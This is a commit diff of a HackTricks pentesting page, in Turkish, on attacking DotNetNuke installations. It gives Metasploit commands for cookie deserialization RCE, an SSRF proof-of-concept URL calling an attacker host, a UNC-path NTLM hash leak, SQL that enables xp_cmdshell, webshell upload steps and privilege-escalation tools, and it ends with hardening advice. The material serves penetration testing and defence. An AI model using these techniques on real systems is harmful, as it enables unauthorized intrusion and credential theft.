mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/network-services-pentesting/pentesting-web/dotnetnuke-d
This commit is contained in:
parent
aa20158164
commit
a91fe9a97e
@ -4,37 +4,92 @@
|
||||
|
||||
## DotNetNuke (DNN)
|
||||
|
||||
DNN'ye **yönetici** olarak girdiğinizde RCE elde etmek kolaydır.
|
||||
DNN'ye **yönetici** olarak girdiğinizde **RCE** elde etmek kolaydır, ancak son birkaç yılda bir dizi *kimlik doğrulaması yapılmamış* ve *kimlik doğrulaması sonrası* teknik yayınlanmıştır. Aşağıdaki kılavuz, hem saldırgan hem de savunma çalışmaları için en kullanışlı temel bileşenleri toplar.
|
||||
|
||||
## RCE
|
||||
---
|
||||
## Versiyon & Ortam Sayımı
|
||||
|
||||
### SQL Üzerinden
|
||||
* *X-DNN* HTTP yanıt başlığını kontrol edin – genellikle tam platform sürümünü açıklar.
|
||||
* Kurulum sihirbazı, `/Install/Install.aspx?mode=install` içinde sürümü sızdırır (çok eski kurulumlarda erişilebilir).
|
||||
* `/API/PersonaBar/GetStatus` (9.x) düşük ayrıcalıklı kullanıcılar için `"dnnVersion"` içeren bir JSON nesnesi döner.
|
||||
* Canlı bir örnekte göreceğiniz tipik çerezler:
|
||||
* `.DOTNETNUKE` – ASP.NET formları kimlik doğrulama bileti.
|
||||
* `DNNPersonalization` – XML/serileştirilmiş kullanıcı profili verilerini içerir (eski sürümler – aşağıdaki RCE'ye bakın).
|
||||
|
||||
**`Settings`** sayfasında bir SQL konsolu mevcuttur; burada **`xp_cmdshell`**'i etkinleştirebilir ve **işletim sistemi komutları** çalıştırabilirsiniz.
|
||||
---
|
||||
## Kimlik Doğrulaması Yapılmamış Sömürü
|
||||
|
||||
**`xp_cmdshell`**'i etkinleştirmek için bu satırları kullanın:
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options', '1'
|
||||
RECONFIGURE
|
||||
EXEC sp_configure 'xp_cmdshell', '1'
|
||||
RECONFIGURE
|
||||
### 1. Çerez Serileştirme RCE (CVE-2017-9822 & takipleri)
|
||||
*Etkilenen sürümler ≤ 9.3.0-RC*
|
||||
|
||||
`DNNPersonalization`, yerleşik 404 işleyicisi etkinleştirildiğinde her istekte serileştirilir. Bu nedenle, hazırlanmış XML, keyfi gadget zincirlerine ve kod yürütmeye yol açabilir.
|
||||
```
|
||||
Ve **"Run Script"** butonuna basarak o sQL cümlelerini çalıştırın.
|
||||
|
||||
Ardından, OS komutlarını çalıştırmak için aşağıdakine benzer bir şey kullanın:
|
||||
```sql
|
||||
xp_cmdshell 'whoami'
|
||||
msf> use exploit/windows/http/dnn_cookie_deserialization_rce
|
||||
msf> set RHOSTS <target>
|
||||
msf> set LHOST <attacker_ip>
|
||||
msf> run
|
||||
```
|
||||
### ASP webshell Üzerinden
|
||||
Modül, yamanmış ancak hala savunmasız olan sürümler için doğru yolu otomatik olarak seçer (CVE-2018-15811/15812/18325/18326). Sömürü, 7.x–9.1.x sürümlerinde **kimlik doğrulama olmadan** ve 9.2.x+ sürümlerinde *doğrulanmış* düşük ayrıcalıklı bir hesapla çalışır.
|
||||
|
||||
`Settings -> Security -> More -> More Security Settings` altında `Allowable File Extensions` kısmında **yeni izin verilen uzantılar ekleyebilirsiniz** ve ardından `Save` butonuna tıklayabilirsiniz.
|
||||
### 2. Sunucu Tarafı İstek Sahteciliği (CVE-2025-32372)
|
||||
*Etkilenen sürümler < 9.13.8 – Yamanın yayımlanma tarihi Nisan 2025*
|
||||
|
||||
**`asp`** veya **`aspx`** ekleyin ve ardından **`/admin/file-management`** altında bir **asp webshell** olan `shell.asp` dosyasını yükleyin.
|
||||
Eski `DnnImageHandler` düzeltmesinin bir atlatması, bir saldırganın sunucuyu **keyfi GET istekleri** yapmaya zorlamasını sağlar (yarı-kör SSRF). Pratik etkiler:
|
||||
|
||||
Sonra **`/Portals/0/shell.asp`** adresine erişerek webshell'inize ulaşabilirsiniz.
|
||||
* Bulut dağıtımlarında iç port taraması / meta veri hizmeti keşfi.
|
||||
* Aksi takdirde İnternet'ten güvenlik duvarıyla korunmuş olan ev sahiplerine ulaşma.
|
||||
|
||||
### Yetki Yükseltme
|
||||
Kanıt konsepti (değiştir `TARGET` & `ATTACKER`):
|
||||
```
|
||||
https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc
|
||||
```
|
||||
İstek arka planda tetiklenir; geri çağırmalar için dinleyicinizi izleyin.
|
||||
|
||||
Örneğin **Potatoes** veya **PrintSpoofer** kullanarak **yetkileri yükseltebilirsiniz**.
|
||||
### 3. NTLM Hash Sızıntısı UNC Yönlendirmesi ile (CVE-2025-52488)
|
||||
*Etkilenen sürümler 6.0.0 – 9.x (< 10.0.1)*
|
||||
|
||||
Özel olarak hazırlanmış içerik, DNN'nin `\\attacker\share\img.png` gibi bir **UNC yolu** kullanarak bir kaynağı almaya çalışmasına neden olabilir. Windows, NTLM müzakeresini memnuniyetle gerçekleştirir ve sunucu-hesap hash'lerini saldırgana sızdırır. **10.0.1** sürümüne yükseltin veya güvenlik duvarında dışa dönük SMB'yi devre dışı bırakın.
|
||||
|
||||
### 4. IP Filtre Atlatma (CVE-2025-52487)
|
||||
Yönetici portalı koruması için *Host/IP Filtreleri*'ne güvenen yöneticiler, **10.0.1** sürümünden önceki sürümlerin, ters proxy senaryosunda `X-Forwarded-For`'ı manipüle ederek atlatılabileceğini bilmelidir.
|
||||
|
||||
---
|
||||
## Kimlik Doğrulama Sonrası RCE
|
||||
|
||||
### SQL konsolu aracılığıyla
|
||||
**`Ayarlar → SQL`** altında, site veritabanına karşı sorgu çalıştırmaya olanak tanıyan yerleşik bir sorgu penceresi bulunmaktadır. Microsoft SQL Server'da **`xp_cmdshell`**'i etkinleştirip komutlar başlatabilirsiniz:
|
||||
```sql
|
||||
EXEC sp_configure 'show advanced options', 1;
|
||||
RECONFIGURE;
|
||||
EXEC sp_configure 'xp_cmdshell', 1;
|
||||
RECONFIGURE;
|
||||
GO
|
||||
xp_cmdshell 'whoami';
|
||||
```
|
||||
### ASPX webshell yükleme ile
|
||||
1. **`Ayarlar → Güvenlik → Daha Fazla → Daha Fazla Güvenlik Ayarları`** kısmına gidin.
|
||||
2. **İzin Verilen Dosya Uzantıları** kısmına `aspx` (veya `asp`) ekleyin ve **Kaydet** butonuna tıklayın.
|
||||
3. **`/admin/file-management`** kısmına gidin ve `shell.aspx` dosyasını yükleyin.
|
||||
4. Bunu **`/Portals/0/shell.aspx`** adresinde tetikleyin.
|
||||
|
||||
---
|
||||
## Windows'ta Yetki Yükseltme
|
||||
Kod yürütme **IIS AppPool\<Site>** olarak gerçekleştirildiğinde, yaygın Windows yetki yükseltme teknikleri geçerlidir. Eğer sistem savunmasızsa, şunları kullanabilirsiniz:
|
||||
|
||||
* **PrintSpoofer** / **SpoolFool** ile *SeImpersonatePrivilege*'i kötüye kullanın.
|
||||
* *Service Accounts*'tan kaçmak için **Juicy/Sharp Potatoes** kullanın.
|
||||
|
||||
---
|
||||
## Güçlendirme Önerileri (Mavi Takım)
|
||||
|
||||
* En az **9.13.9** sürümüne (SSRF atlatmasını düzeltir) veya tercihen **10.0.1** sürümüne yükseltin (IP filtreleme ve NTLM sorunları).
|
||||
* Kurulumdan sonra kalan **`InstallWizard.aspx*`** dosyalarını kaldırın.
|
||||
* Çıkış yapan SMB'yi (portlar 445/139) devre dışı bırakın.
|
||||
* DNN içinde değil, kenar proxy'sinde güçlü *Host Filtreleri* uygulayın.
|
||||
* Kullanılmıyorsa `/API/RemoteContentProxy` erişimini engelleyin.
|
||||
|
||||
## Referanslar
|
||||
|
||||
* Metasploit `dnn_cookie_deserialization_rce` modül belgeleri – pratik kimlik doğrulamasız RCE detayları (GitHub).
|
||||
* GitHub Güvenlik Danışmanlığı GHSA-3f7v-qx94-666m – 2025 SSRF atlatma ve yamanma bilgileri.
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user